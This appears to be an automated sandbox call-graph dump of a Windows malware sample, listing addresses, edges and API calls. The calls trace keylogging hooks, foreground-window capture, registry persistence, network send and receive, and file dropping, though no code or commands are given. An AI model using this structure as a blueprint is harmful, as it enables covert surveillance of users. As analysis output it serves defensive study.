40415e 28 API calls 45534->45537 45535->45503 45538 401ee9 11 API calls 45536->45538 45540 40ba7b 45537->45540 45538->45518 45539 40bb46 45541 40415e 28 API calls 45539->45541 45540->45539 45542 40415e 28 API calls 45540->45542 45543 40bb55 45541->45543 45544 40bab4 45542->45544 45545 40415e 28 API calls 45543->45545 45546 40415e 28 API calls 45544->45546 45547 40bb65 45545->45547 45548 40bac7 45546->45548 45932 4042fd 28 API calls 45547->45932 45549 402ff4 28 API calls 45548->45549 45551 40bad5 45549->45551 45931 402f85 28 API calls 45551->45931 45552 40bb73 45933 402f85 28 API calls 45552->45933 45555 40bae4 45557 402ff4 28 API calls 45555->45557 45556 40bb82 45558 402ff4 28 API calls 45556->45558 45559 40baf0 45557->45559 45560 40bb91 45558->45560 45561 402ff4 28 API calls 45559->45561 45563 401ee9 11 API calls 45560->45563 45562 40bafc 45561->45562 45566 401ee9 11 API calls 45562->45566 45564 40bba8 45563->45564 45565 401ee9 11 API calls 45564->45565 45567 40bbb4 45565->45567 45568 40bb10 45566->45568 45569 401ee9 11 API calls 45567->45569 45570 401ee9 11 API calls 45568->45570 45571 40bbc0 45569->45571 45572 40bb19 45570->45572 45573 401ee9 11 API calls 45571->45573 45574 401ee9 11 API calls 45572->45574 45575 40bbc9 45573->45575 45576 40bb22 45574->45576 45578 401ee9 11 API calls 45575->45578 45577 401ee9 11 API calls 45576->45577 45579 40bb2e 45577->45579 45583 40bbd2 45578->45583 45580 401ee9 11 API calls 45579->45580 45581 40bb3a 45580->45581 45582 401ee9 11 API calls 45581->45582 45582->45539 45934 41a17b 45583->45934 45585 40bc0c 45586 40bc3c 45585->45586 45588 40bc23 ShellExecuteW 45585->45588 45587 401ee9 11 API calls 45586->45587 45589 40bc45 45587->45589 45588->45586 45590 40bc35 ExitProcess 45588->45590 45591 401ee9 11 API calls 45589->45591 45591->45503 45593 412356 45592->45593 45594 4062ee 28 API calls 45593->45594 45595 41236b 45594->45595 45596 4020d6 28 API calls 45595->45596 45597 41237b 45596->45597 45598 41215f 14 API calls 45597->45598 45599 412385 45598->45599 45600 401fb8 11 API calls 45599->45600 45601 412392 45600->45601 45601->45206 45603 4121af 45602->45603 45605 412178 45602->45605 45604 401fb8 11 API calls 45603->45604 45606 40da38 45604->45606 45607 41218a RegSetValueExA RegCloseKey 45605->45607 45606->45157 45607->45603 45609 439880 _swprintf 45608->45609 45988 438bbe 45609->45988 45611 40da51 45611->45164 45611->45166 45613 4194f0 GetLocalTime 45612->45613 45614 41958b 45612->45614 45616 4052fe 28 API calls 45613->45616 45615 401fb8 11 API calls 45614->45615 45618 419593 45615->45618 45617 419532 45616->45617 45619 408209 28 API calls 45617->45619 45620 401fb8 11 API calls 45618->45620 45621 41953e 45619->45621 45622 40daa1 45620->45622 46016 402ef0 45621->46016 45622->45181 45625 408209 28 API calls 45626 419556 45625->45626 46021 41928b 76 API calls 45626->46021 45628 419564 45629 401fb8 11 API calls 45628->45629 45630 419570 45629->45630 45631 401fb8 11 API calls 45630->45631 45632 419579 45631->45632 45633 401fb8 11 API calls 45632->45633 45634 419582 45633->45634 45635 401fb8 11 API calls 45634->45635 45635->45614 45637 401f66 11 API calls 45636->45637 45638 408f36 _wcslen 45637->45638 45639 408f60 45638->45639 45640 408f49 45638->45640 45642 40c5ed 32 API calls 45639->45642 45641 40c5ed 32 API calls 45640->45641 45643 408f51 45641->45643 45644 408f68 45642->45644 45645 401ef3 28 API calls 45643->45645 45646 401ef3 28 API calls 45644->45646 45672 408f5b 45645->45672 45647 408f76 45646->45647 45648 401ee9 11 API calls 45647->45648 45650 408f7e 45648->45650 45649 401ee9 11 API calls 45651 408fb5 45649->45651 45652 4081c7 28 API calls 45650->45652 45653 408ffb 45651->45653 45654 408fdc 45651->45654 45655 408f90 45652->45655 46022 408098 45653->46022 45656 408fe1 45654->45656 45657 409013 45654->45657 45659 402ff4 28 API calls 45655->45659 45663 408098 28 API calls 45656->45663 45662 401ee9 11 API calls 45657->45662 45661 408f9b 45659->45661 45665 401ef3 28 API calls 45661->45665 45666 40901b 45662->45666 45667 408fef 45663->45667 45668 408fa5 45665->45668 45666->45224 46050 4092ba 29 API calls 45667->46050 45670 401ee9 11 API calls 45668->45670 45670->45672 45671 408ff9 45671->45657 45672->45649 45674 40415e 28 API calls 45673->45674 45675 419647 45674->45675 46188 4042dc 45675->46188 45678 402ff4 28 API calls 45679 41965d 45678->45679 45680 401ee9 11 API calls 45679->45680 45681 419666 45680->45681 45682 401ee9 11 API calls 45681->45682 45683 40dca2 45682->45683 45684 401ef3 45683->45684 45685 401f02 45684->45685 45686 401f4a 45684->45686 45687 402232 11 API calls 45685->45687 45686->45263 45688 401f0b 45687->45688 45689 401f4d 45688->45689 45691 401f26 45688->45691 45690 402316 11 API calls 45689->45690 45690->45686 46263 40303c 28 API calls 45691->46263 46264 40533f 28 API calls 45693->46264 45696 4020bf 11 API calls 45695->45696 45697 413994 45696->45697 46265 419894 45697->46265 45700 4020bf 11 API calls 45701 4139aa 45700->45701 45702 401e45 22 API calls 45701->45702 45703 4139b8 45702->45703 45704 439867 39 API calls 45703->45704 45705 4139c5 45704->45705 45706 4139d7 45705->45706 45707 4139ca Sleep 45705->45707 45708 402073 28 API calls 45706->45708 45707->45706 45709 4139e6 45708->45709 45710 401e45 22 API calls 45709->45710 45711 4139ef 45710->45711 45712 4020d6 28 API calls 45711->45712 45713 4139fa 45712->45713 45714 419d87 28 API calls 45713->45714 45715 413a02 45714->45715 45716 401e45 22 API calls 45715->45716 45717 413a15 45716->45717 45718 401e45 22 API calls 45717->45718 45756 413a94 45717->45756 45719 413a2e 45718->45719 45720 401e45 22 API calls 45719->45720 45721 413a3f 45720->45721 45723 401e45 22 API calls 45721->45723 45722 419d87 28 API calls 45722->45756 45724 413a50 45723->45724 45725 401e45 22 API calls 45724->45725 45727 413a61 45725->45727 45726 40822a 28 API calls 45726->45756 45729 401e45 22 API calls 45727->45729 45728 401fc2 28 API calls 45728->45756 45730 413a72 45729->45730 45731 401e45 22 API calls 45730->45731 45732 413a84 45731->45732 46417 40471d 88 API calls 45732->46417 45733 401e45 22 API calls 45733->45756 45735 4194da 79 API calls 45735->45756 45737 413be2 WSAGetLastError 46274 41a86b 45737->46274 45739 4052dd 28 API calls 45739->45756 45743 4052fe 28 API calls 45743->45756 45744 401e6d 11 API calls 45744->45756 45745 408209 28 API calls 45745->45756 45746 439867 39 API calls 45747 4144bf Sleep 45746->45747 45747->45756 45750 408098 28 API calls 45750->45756 45751 43f34f 20 API calls 45751->45756 45752 4020d6 28 API calls 45752->45756 45753 4120e8 3 API calls 45753->45756 45754 411f91 31 API calls 45754->45756 45755 40415e 28 API calls 45755->45756 45756->45722 45756->45726 45756->45728 45756->45733 45756->45735 45756->45737 45756->45739 45756->45743 45756->45744 45756->45745 45756->45746 45756->45750 45756->45751 45756->45752 45756->45753 45756->45754 45756->45755 45757 401e45 22 API calls 45756->45757 45761 419b16 28 API calls 45756->45761 45764 419c8a 28 API calls 45756->45764 45766 402e81 28 API calls 45756->45766 45767 402ef0 28 API calls 45756->45767 45768 40826c 28 API calls 45756->45768 45770 401fb8 11 API calls 45756->45770 45771 401ee9 11 API calls 45756->45771 45773 414423 45756->45773 45775 402073 28 API calls 45756->45775 45776 414461 CreateThread 45756->45776 46269 41393f 45756->46269 46285 404f31 45756->46285 46297 4048a8 45756->46297 46356 4197c1 45756->46356 46359 413013 45756->46359 46362 419ac6 GetLastInputInfo GetTickCount 45756->46362 46363 419a77 45756->46363 46368 40e2bb GetLocaleInfoA 45756->46368 46371 402f11 45756->46371 46376 404a81 45756->46376 46389 404bf0 45756->46389 46407 404e06 45756->46407 45758 413e7b GetTickCount 45757->45758 45759 419b16 28 API calls 45758->45759 45759->45756 45761->45756 45764->45756 45766->45756 45767->45756 45768->45756 45770->45756 45771->45756 46418 409f9a 84 API calls 45773->46418 45775->45756 45776->45756 46498 418ccd 103 API calls 45776->46498 45777->45051 45778->45059 45779->45063 45781->45089 45782->45135 45783->45108 45784->45220 45785->45223 45787 41210e RegQueryValueExA RegCloseKey 45786->45787 45788 412132 45786->45788 45787->45788 45788->45136 45789->45171 45790->45262 45791->45251 45792->45112 45795 4194b0 LoadResource LockResource SizeofResource 45794->45795 45796 40dd9e 45794->45796 45795->45796 45796->45306 45798 40209f 45797->45798 45799 4023ae 11 API calls 45798->45799 45800 4020aa 45799->45800 45801 4024ea 28 API calls 45800->45801 45802 4020b9 45801->45802 45802->45310 45804 402097 28 API calls 45803->45804 45805 406302 45804->45805 45805->45317 45807 4020c7 45806->45807 45808 4023ae 11 API calls 45807->45808 45809 4020d2 45808->45809 45809->45326 45810->45326 45812 41aba7 45811->45812 45813 41ac06 45812->45813 45817 41abb7 45812->45817 45814 41ac20 45813->45814 45815 41ad46 28 API calls 45813->45815 45832 41aec3 28 API calls 45814->45832 45815->45814 45819 41abef 45817->45819 45823 41ad46 45817->45823 45831 41aec3 28 API calls 45819->45831 45821 41ac02 45821->45326 45822->45335 45825 41ad4e 45823->45825 45824 41ad80 45824->45819 45825->45824 45826 41ad84 45825->45826 45827 41ad68 45825->45827 45843 402705 22 API calls 45826->45843 45833 41adb7 45827->45833 45831->45821 45832->45821 45834 41adc1 __EH_prolog 45833->45834 45844 4026f7 22 API calls 45834->45844 45836 41add4 45845 41aeda 11 API calls 45836->45845 45838 41ae32 45838->45824 45839 41adfa 45839->45838 45846 402710 11 API calls 45839->45846 45841 41ae19 45847 4026f2 11 API calls std::_Deallocate 45841->45847 45844->45836 45845->45839 45846->45841 45847->45838 45848->45349 45849->45353 45850->45355 45853 40328a 45852->45853 45854 4032a9 45853->45854 45855 4028c8 28 API calls 45853->45855 45854->45365 45855->45854 45857 4051db 45856->45857 45860 405254 45857->45860 45859 4051e8 45859->45368 45861 405262 45860->45861 45862 405268 45861->45862 45863 40527e 45861->45863 45866 4025d0 28 API calls 45862->45866 45864 4052d5 45863->45864 45865 405296 45863->45865 45871 402884 22 API calls 45864->45871 45869 4028c8 28 API calls 45865->45869 45870 40527c 45865->45870 45866->45870 45869->45870 45870->45859 45872->45379 45873->45381 45875 419f30 GetCurrentProcess IsWow64Process 45874->45875 45876 4192bc 45874->45876 45875->45876 45877 419f47 45875->45877 45878 411f91 RegOpenKeyExA 45876->45878 45877->45876 45879 411fbf RegQueryValueExA RegCloseKey 45878->45879 45880 411fe9 45878->45880 45879->45880 45881 402073 28 API calls 45880->45881 45882 411ffe 45881->45882 45882->45397 45883->45405 45884->45413 45886 401f6e 45885->45886 45887 402232 11 API calls 45886->45887 45888 401f79 45887->45888 45888->45425 45888->45426 45888->45428 45889->45433 45890->45459 45891->45458 45892->45447 45893->45451 45894->45457 45896 401f66 11 API calls 45895->45896 45897 4081d3 45896->45897 45944 40312c 45897->45944 45899 4081f0 45899->45490 45949 403202 45900->45949 45902 403002 45953 403242 45902->45953 45906 40b7e3 45905->45906 45907 40b7a5 45905->45907 45909 40b826 45906->45909 45912 40a8cc 28 API calls 45906->45912 45977 40a8cc 45907->45977 45911 40b869 45909->45911 45914 40a8cc 28 API calls 45909->45914 45910 40b7b9 45913 402ff4 28 API calls 45910->45913 45911->45503 45915 40b7fc 45912->45915 45916 40b7c3 45913->45916 45917 40b83f 45914->45917 45918 402ff4 28 API calls 45915->45918 45982 412204 RegCreateKeyW 45916->45982 45920 402ff4 28 API calls 45917->45920 45921 40b806 45918->45921 45923 40b849 45920->45923 45924 412204 14 API calls 45921->45924 45926 412204 14 API calls 45923->45926 45927 40b81a 45924->45927 45925 401ee9 11 API calls 45925->45906 45929 40b85d 45926->45929 45928 401ee9 11 API calls 45927->45928 45928->45909 45930 401ee9 11 API calls 45929->45930 45930->45911 45931->45555 45932->45552 45933->45556 45935 41a18e CreateFileW 45934->45935 45937 41a1c7 45935->45937 45938 41a1cb 45935->45938 45937->45585 45939 41a1d2 SetFilePointer 45938->45939 45940 41a1eb WriteFile 45938->45940 45939->45940 45941 41a1e2 CloseHandle 45939->45941 45942 41a200 CloseHandle 45940->45942 45943 41a1fe 45940->45943 45941->45937 45942->45937 45943->45942 45946 403136 45944->45946 45945 403155 45945->45899 45946->45945 45948 4027c6 28 API calls 45946->45948 45948->45945 45950 40320e 45949->45950 45959 4035f8 45950->45959 45952 40321b 45952->45902 45954 40324e 45953->45954 45955 402232 11 API calls 45954->45955 45956 403268 45955->45956 45973 402316 45956->45973 45960 403606 45959->45960 45961 403624 45960->45961 45962 40360c 45960->45962 45963 40363c 45961->45963 45964 40367e 45961->45964 45970 403686 28 API calls 45962->45970 45969 403622 45963->45969 45971 4027c6 28 API calls 45963->45971 45972 402884 22 API calls 45964->45972 45969->45952 45970->45969 45971->45969 45974 402327 45973->45974 45975 402232 11 API calls 45974->45975 45976 4023a7 45975->45976 45976->45494 45978 401f66 11 API calls 45977->45978 45979 40a8d8 45978->45979 45980 40312c 28 API calls 45979->45980 45981 40a8f4 45980->45981 45981->45910 45983 412257 45982->45983 45985 412219 45982->45985 45984 401ee9 11 API calls 45983->45984 45986 40b7d7 45984->45986 45987 412232 RegSetValueExW RegCloseKey 45985->45987 45986->45925 45987->45983 46004 4397c5 45988->46004 45990 438c0b 46010 438557 35 API calls 3 library calls 45990->46010 45992 438bd0 45992->45990 45993 438be5 45992->45993 46003 438bea pre_c_initialization 45992->46003 46009 43ad91 20 API calls _free 45993->46009 45996 438c17 45997 438c46 45996->45997 46011 43980a 39 API calls __Toupper 45996->46011 46000 438cb2 45997->46000 46012 439771 20 API calls 2 library calls 45997->46012 46013 439771 20 API calls 2 library calls 46000->46013 46001 438d79 _swprintf 46001->46003 46014 43ad91 20 API calls _free 46001->46014 46003->45611 46005 4397ca 46004->46005 46006 4397dd 46004->46006 46015 43ad91 20 API calls _free 46005->46015 46006->45992 46008 4397cf pre_c_initialization 46008->45992 46009->46003 46010->45996 46011->45996 46012->46000 46013->46001 46014->46003 46015->46008 46017 401f90 28 API calls 46016->46017 46018 402efe 46017->46018 46019 402035 11 API calls 46018->46019 46020 402f0d 46019->46020 46020->45625 46021->45628 46023 4080ae 46022->46023 46024 402232 11 API calls 46023->46024 46025 4080c8 46024->46025 46026 404247 28 API calls 46025->46026 46027 4080d6 46026->46027 46028 409203 46027->46028 46051 40a83c 46028->46051 46031 409257 46034 402073 28 API calls 46031->46034 46032 40922f 46033 402073 28 API calls 46032->46033 46035 409239 46033->46035 46036 409262 46034->46036 46055 419bca 28 API calls 46035->46055 46038 402073 28 API calls 46036->46038 46040 409271 46038->46040 46039 409247 46056 40a0b0 31 API calls _Yarn 46039->46056 46042 4194da 79 API calls 46040->46042 46044 409276 CreateThread 46042->46044 46043 40924e 46045 401fb8 11 API calls 46043->46045 46046 409291 CreateThread 46044->46046 46047 40929d CreateThread 46044->46047 46064 409305 46044->46064 46045->46031 46046->46047 46061 4092ef 46046->46061 46048 401ee9 11 API calls 46047->46048 46058 409311 46047->46058 46049 4092b1 46048->46049 46049->45657 46050->45671 46187 4092fb 160 API calls 46050->46187 46052 40a845 46051->46052 46053 409221 46051->46053 46057 40a8bc 28 API calls 46052->46057 46053->46031 46053->46032 46055->46039 46056->46043 46057->46053 46067 409c1f 46058->46067 46120 409340 46061->46120 46140 40971e 46064->46140 46093 409c2d 46067->46093 46068 40931a 46069 409c87 Sleep GetForegroundWindow GetWindowTextLengthW 46097 40a854 46069->46097 46073 401f66 11 API calls 46073->46093 46074 419ac6 GetLastInputInfo GetTickCount 46074->46093 46076 409ccd GetWindowTextW 46076->46093 46078 401ee9 11 API calls 46078->46093 46079 409e25 46081 401ee9 11 API calls 46079->46081 46080 40a83c 28 API calls 46080->46093 46081->46068 46082 409d92 Sleep 46082->46093 46085 402073 28 API calls 46085->46093 46086 4052dd 28 API calls 46086->46093 46087 408098 28 API calls 46092 409d1a 46087->46092 46088 40a8cc 28 API calls 46088->46093 46089 408209 28 API calls 46089->46093 46091 402ff4 28 API calls 46091->46093 46092->46087 46092->46093 46107 40a0b0 31 API calls _Yarn 46092->46107 46093->46068 46093->46069 46093->46073 46093->46074 46093->46076 46093->46078 46093->46079 46093->46080 46093->46082 46093->46085 46093->46086 46093->46088 46093->46089 46093->46091 46093->46092 46095 40962e 12 API calls 46093->46095 46096 401fb8 11 API calls 46093->46096 46103 43219b EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 46093->46103 46104 432525 23 API calls __onexit 46093->46104 46105 43215c SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 46093->46105 46106 408080 28 API calls 46093->46106 46108 40a694 40 API calls 2 library calls 46093->46108 46109 43f34f 46093->46109 46113 419bca 28 API calls 46093->46113 46095->46093 46096->46093 46098 40a85c 46097->46098 46099 402232 11 API calls 46098->46099 46100 40a867 46099->46100 46114 40a87c 28 API calls 46100->46114 46102 40a876 46102->46093 46104->46093 46105->46093 46106->46093 46107->46092 46108->46093 46110 43f35b 46109->46110 46115 43f14b 46110->46115 46112 43f37c 46112->46093 46113->46093 46114->46102 46116 43f162 46115->46116 46118 43f199 pre_c_initialization 46116->46118 46119 43ad91 20 API calls _free 46116->46119 46118->46112 46119->46118 46121 409359 GetModuleHandleA SetWindowsHookExA 46120->46121 46122 4093bb GetMessageA 46120->46122 46121->46122 46125 409375 GetLastError 46121->46125 46123 4092f8 46122->46123 46124 4093cd TranslateMessage DispatchMessageA 46122->46124 46124->46122 46124->46123 46135 419b16 46125->46135 46128 4052dd 28 API calls 46129 409396 46128->46129 46130 402073 28 API calls 46129->46130 46131 4093a5 46130->46131 46132 4194da 79 API calls 46131->46132 46133 4093aa 46132->46133 46134 401fb8 11 API calls 46133->46134 46134->46123 46136 43f34f 20 API calls 46135->46136 46137 419b3a 46136->46137 46138 402073 28 API calls 46137->46138 46139 409386 46138->46139 46139->46128 46141 409733 Sleep 46140->46141 46161 40966d 46141->46161 46143 40930e 46144 409773 CreateDirectoryW 46149 409745 46144->46149 46145 409784 GetFileAttributesW 46145->46149 46146 40979b SetFileAttributesW 46146->46149 46147 41a17b 5 API calls 46147->46149 46148 409815 PathFileExistsW 46157 4097e6 46148->46157 46149->46141 46149->46143 46149->46144 46149->46145 46149->46146 46149->46147 46150 401e45 22 API calls 46149->46150 46154 40991e SetFileAttributesW 46149->46154 46149->46157 46150->46149 46151 4020bf 11 API calls 46151->46157 46152 402097 28 API calls 46152->46157 46154->46149 46155 4062ee 28 API calls 46155->46157 46156 401fc2 28 API calls 46156->46157 46157->46148 46157->46151 46157->46152 46157->46155 46157->46156 46159 401fb8 11 API calls 46157->46159 46160 401fb8 11 API calls 46157->46160 46173 41a20f CreateFileW 46157->46173 46181 41a27c CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 46157->46181 46159->46157 46160->46149 46162 40971a 46161->46162 46165 409683 46161->46165 46162->46149 46163 4096a2 CreateFileW 46164 4096b0 GetFileSize 46163->46164 46163->46165 46164->46165 46166 4096e5 CloseHandle 46164->46166 46165->46163 46165->46166 46167 4096f7 46165->46167 46168 4096da Sleep 46165->46168 46182 40a025 83 API calls 46165->46182 46166->46165 46167->46162 46170 408098 28 API calls 46167->46170 46168->46166 46171 409713 46170->46171 46172 409203 124 API calls 46171->46172 46172->46162 46174 41a235 46173->46174 46175 41a239 GetFileSize 46173->46175 46174->46157 46183 40242e 46175->46183 46177 41a24d 46178 41a25f ReadFile 46177->46178 46179 41a26c 46178->46179 46180 41a26e CloseHandle 46178->46180 46179->46180 46180->46174 46181->46157 46182->46168 46184 402436 46183->46184 46185 402a31 28 API calls 46184->46185 46186 402440 46184->46186 46185->46186 46186->46177 46193 404333 46188->46193 46190 4042ea 46191 403242 11 API calls 46190->46191 46192 4042f9 46191->46192 46192->45678 46194 40433f 46193->46194 46197 404351 46194->46197 46196 40434d 46196->46190 46198 40435f 46197->46198 46199 404365 46198->46199 46200 40437e 46198->46200 46260 4034c6 28 API calls 46199->46260 46201 402868 22 API calls 46200->46201 46202 404386 46201->46202 46204 4043f9 46202->46204 46205 40439f 46202->46205 46262 402884 22 API calls 46204->46262 46216 40437c 46205->46216 46261 4027c6 28 API calls 46205->46261 46216->46196 46260->46216 46261->46216 46263->45686 46266 4198da _Yarn ___scrt_fastfail 46265->46266 46267 402073 28 API calls 46266->46267 46268 41399f 46267->46268 46268->45700 46270 413958 getaddrinfo WSASetLastError 46269->46270 46271 41394e 46269->46271 46270->45756 46419 4137dc 29 API calls ___std_exception_copy 46271->46419 46273 413953 46273->46270 46275 4020bf 11 API calls 46274->46275 46276 41a87f FormatMessageA 46275->46276 46277 41a8ab 46276->46277 46278 41a89d 46276->46278 46280 41a8b6 LocalFree 46277->46280 46279 402073 28 API calls 46278->46279 46281 41a8a9 46279->46281 46282 402035 11 API calls 46280->46282 46283 401fb8 11 API calls 46281->46283 46282->46281 46284 41a8d2 46283->46284 46284->45756 46286 404f4e 46285->46286 46287 404f45 46285->46287 46286->45756 46287->46286 46288 419b16 28 API calls 46287->46288 46289 404f71 46288->46289 46290 4052dd 28 API calls 46289->46290 46291 404f81 46290->46291 46292 402073 28 API calls 46291->46292 46293 404f90 46292->46293 46294 4194da 79 API calls 46293->46294 46295 404f95 46294->46295 46296 401fb8 11 API calls 46295->46296 46296->46286 46298 4048c6 46297->46298 46299 4048ce 46298->46299 46304 4049fb 46298->46304 46300 404903 46299->46300 46301 4052fe 28 API calls 46299->46301 46336 40495e 46299->46336 46420 41ea15 27 API calls 46300->46420 46303 4048ef 46301->46303 46308 402073 28 API calls 46303->46308 46307 404912 46304->46307 46309 404a16 46304->46309 46304->46336 46305 40490b 46306 404921 46305->46306 46305->46307 46316 404930 46306->46316 46317 404967 46306->46317 46312 402073 28 API calls 46307->46312 46310 4048fe 46308->46310 46311 41a86b 30 API calls 46309->46311 46313 4194da 79 API calls 46310->46313 46314 404a20 46311->46314 46318 404a60 46312->46318 46313->46300 46315 4052dd 28 API calls 46314->46315 46319 404a30 46315->46319 46320 402073 28 API calls 46316->46320 46422 41f7f5 53 API calls 46317->46422 46321 402073 28 API calls 46318->46321 46324 402073 28 API calls 46319->46324 46325 40493f 46320->46325 46326 404a6f 46321->46326 46323 40496f 46327 4049a4 46323->46327 46328 404974 46323->46328 46329 404a3f 46324->46329 46330 402073 28 API calls 46325->46330 46331 4194da 79 API calls 46326->46331 46424 41ebbb 28 API calls 46327->46424 46332 402073 28 API calls 46328->46332 46333 4194da 79 API calls 46329->46333 46334 40494e 46330->46334 46331->46336 46337 404983 46332->46337 46338 404a44 46333->46338 46339 4194da 79 API calls 46334->46339 46336->45756 46341 402073 28 API calls 46337->46341 46342 401fb8 11 API calls 46338->46342 46343 404953 46339->46343 46340 4049ac 46344 4049d9 CreateEventW 46340->46344 46346 402073 28 API calls 46340->46346 46345 404992 46341->46345 46342->46336 46421 41c4c6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46343->46421 46344->46336 46347 4194da 79 API calls 46345->46347 46349 4049c2 46346->46349 46351 404997 46347->46351 46350 402073 28 API calls 46349->46350 46352 4049d1 46350->46352 46423 41ee67 51 API calls 46351->46423 46354 4194da 79 API calls 46352->46354 46355 4049d6 46354->46355 46355->46344 46425 419797 GlobalMemoryStatusEx 46356->46425 46358 4197d6 46358->45756 46426 412fd6 46359->46426 46362->45756 46364 434c30 ___scrt_fastfail 46363->46364 46365 419a98 GetForegroundWindow GetWindowTextW 46364->46365 46366 40415e 28 API calls 46365->46366 46367 419abe 46366->46367 46367->45756 46369 402073 28 API calls 46368->46369 46370 40e2e0 46369->46370 46370->45756 46372 4020bf 11 API calls 46371->46372 46373 402f1d 46372->46373 46374 403280 28 API calls 46373->46374 46375 402f39 46374->46375 46375->45756 46377 404a94 46376->46377 46464 4051ec 46377->46464 46379 404aa9 _Yarn 46380 404b00 46379->46380 46382 404b20 46379->46382 46381 404b12 send 46380->46381 46383 404b49 46381->46383 46470 41edef 53 API calls 46382->46470 46384 401fb8 11 API calls 46383->46384 46386 404b63 46384->46386 46387 401fb8 11 API calls 46386->46387 46388 404b6b 46387->46388 46388->45756 46390 4020bf 11 API calls 46389->46390 46391 404c07 46390->46391 46392 4020bf 11 API calls 46391->46392 46394 404c10 46392->46394 46393 439adb _Yarn 21 API calls 46393->46394 46394->46393 46396 402097 28 API calls 46394->46396 46397 404c81 46394->46397 46398 401fc2 28 API calls 46394->46398 46400 401fb8 11 API calls 46394->46400 46488 404b76 46394->46488 46493 404ca3 28 API calls 46394->46493 46396->46394 46399 404e06 87 API calls 46397->46399 46398->46394 46401 404c88 46399->46401 46400->46394 46402 401fb8 11 API calls 46401->46402 46403 404c91 46402->46403 46404 401fb8 11 API calls 46403->46404 46405 404c9a 46404->46405 46405->45756 46408 404e1a 46407->46408 46409 404e20 46408->46409 46410 404e53 46408->46410 46411 404e5a 46408->46411 46409->45756 46495 4050c4 83 API calls 46410->46495 46411->46409 46496 41c4c6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46411->46496 46414 404e7b 46497 41c4c6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46414->46497 46416 404e93 SetEvent 46416->46409 46417->45756 46418->45756 46419->46273 46420->46305 46421->46336 46422->46323 46423->46343 46424->46340 46425->46358 46429 412fa9 46426->46429 46430 412fbe ___scrt_initialize_default_local_stdio_options 46429->46430 46433 43eea0 46430->46433 46436 43c3e3 46433->46436 46437 43c423 46436->46437 46438 43c40b 46436->46438 46437->46438 46439 43c42b 46437->46439 46458 43ad91 20 API calls _free 46438->46458 46459 438557 35 API calls 3 library calls 46439->46459 46442 43c43b 46460 43cb38 20 API calls 2 library calls 46442->46460 46443 43c410 pre_c_initialization 46451 432d4b 46443->46451 46446 412fcc 46446->45756 46447 43c4b3 46461 43d0e9 50 API calls 3 library calls 46447->46461 46450 43c4be 46462 43cba2 20 API calls _free 46450->46462 46452 432d56 IsProcessorFeaturePresent 46451->46452 46453 432d54 46451->46453 46455 432d98 46452->46455 46453->46446 46463 432d5c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46455->46463 46457 432e7b 46457->46446 46458->46443 46459->46442 46460->46447 46461->46450 46462->46443 46463->46457 46465 4051f4 46464->46465 46466 4023ae 11 API calls 46465->46466 46467 4051ff 46466->46467 46471 405214 46467->46471 46469 40520e 46469->46379 46470->46383 46472 405220 46471->46472 46473 40524e 46471->46473 46475 4028c8 28 API calls 46472->46475 46487 402884 22 API calls 46473->46487 46477 40522a 46475->46477 46477->46469 46489 404b80 46488->46489 46490 404bad recv 46488->46490 46494 41ee2b 53 API calls 46489->46494 46491 404b9c 46490->46491 46491->46394 46493->46394 46494->46491 46495->46411 46496->46414 46497->46416 46503 411163 ___scrt_fastfail 46499->46503 46500 4111da Sleep 46502 4111b5 46500->46502 46501 40b77f 31 API calls 46501->46502 46502->46500 46502->46501 46505 412338 31 API calls 46502->46505 46506 4111d5 46502->46506 46503->46502 46504 4120e8 3 API calls 46503->46504 46504->46502 46505->46502 46508 410b83 46507->46508 46642 412268 RegCreateKeyA 46508->46642 46510 410b8a 46511 410b90 46510->46511 46512 410ba2 OpenMutexA 46510->46512 46513 410bb9 CloseHandle 46512->46513 46514 410c3e 46512->46514 46515 402073 28 API calls 46513->46515 46516 4020bf 11 API calls 46514->46516 46517 410bcf 46515->46517 46518 410c47 46516->46518 46519 402073 28 API calls 46517->46519 46522 41a20f 32 API calls 46518->46522 46520 410bdf 46519->46520 46521 4194da 79 API calls 46520->46521 46523 410be4 46521->46523 46524 410c5c 46522->46524 46525 402073 28 API calls 46523->46525 46526 401f66 11 API calls 46524->46526 46528 410bf3 46525->46528 46527 410c65 46526->46527 46529 419f23 2 API calls 46527->46529 46530 402073 28 API calls 46528->46530 46532 410c6a 46529->46532 46531 410bfe 46530->46531 46533 4194da 79 API calls 46531->46533 46534 410cc6 46532->46534 46535 410c6e 46532->46535 46536 410c03 CreateThread 46533->46536 46537 40415e 28 API calls 46534->46537 46538 40415e 28 API calls 46535->46538 46539 410c28 46536->46539 46686 411253 59 API calls 46536->46686 46540 410cd4 46537->46540 46541 410c7f 46538->46541 46542 411f34 3 API calls 46539->46542 46544 40415e 28 API calls 46540->46544 46545 40415e 28 API calls 46541->46545 46543 410c2f 46542->46543 46543->46511 46548 410e75 OpenProcess 46543->46548 46546 410cea 46544->46546 46547 410c95 46545->46547 46678 402f85 28 API calls 46546->46678 46677 402f85 28 API calls 46547->46677 46553 410e92 46548->46553 46551 410cf8 46554 401ef3 28 API calls 46551->46554 46552 410ca0 46555 401ef3 28 API calls 46552->46555 46680 41239a 30 API calls 46553->46680 46556 410d03 46554->46556 46557 410cab 46555->46557 46559 401ee9 11 API calls 46556->46559 46560 401ee9 11 API calls 46557->46560 46562 410d0f 46559->46562 46563 410cb4 46560->46563 46561 410e99 46681 410ea4 143 API calls 46561->46681 46566 401ee9 11 API calls 46562->46566 46564 401ee9 11 API calls 46563->46564 46567 410cbd 46564->46567 46566->46567 46569 401ee9 11 API calls 46567->46569 46570 410d21 46569->46570 46571 40415e 28 API calls 46570->46571 46572 410d38 46571->46572 46645 4112e7 46572->46645 46575 401ee9 11 API calls 46576 410d4f 46575->46576 46577 40415e 28 API calls 46576->46577 46578 410d5d 46577->46578 46579 4112e7 28 API calls 46578->46579 46580 410d6b 46579->46580 46581 401ee9 11 API calls 46580->46581 46582 410d74 46581->46582 46583 40415e 28 API calls 46582->46583 46584 410d82 46583->46584 46585 4112e7 28 API calls 46584->46585 46586 410d90 46585->46586 46587 401ee9 11 API calls 46586->46587 46591 410d99 46587->46591 46588 410de3 46589 402073 28 API calls 46588->46589 46590 410df2 46589->46590 46592 402073 28 API calls 46590->46592 46591->46588 46593 401e45 22 API calls 46591->46593 46600 410e3c 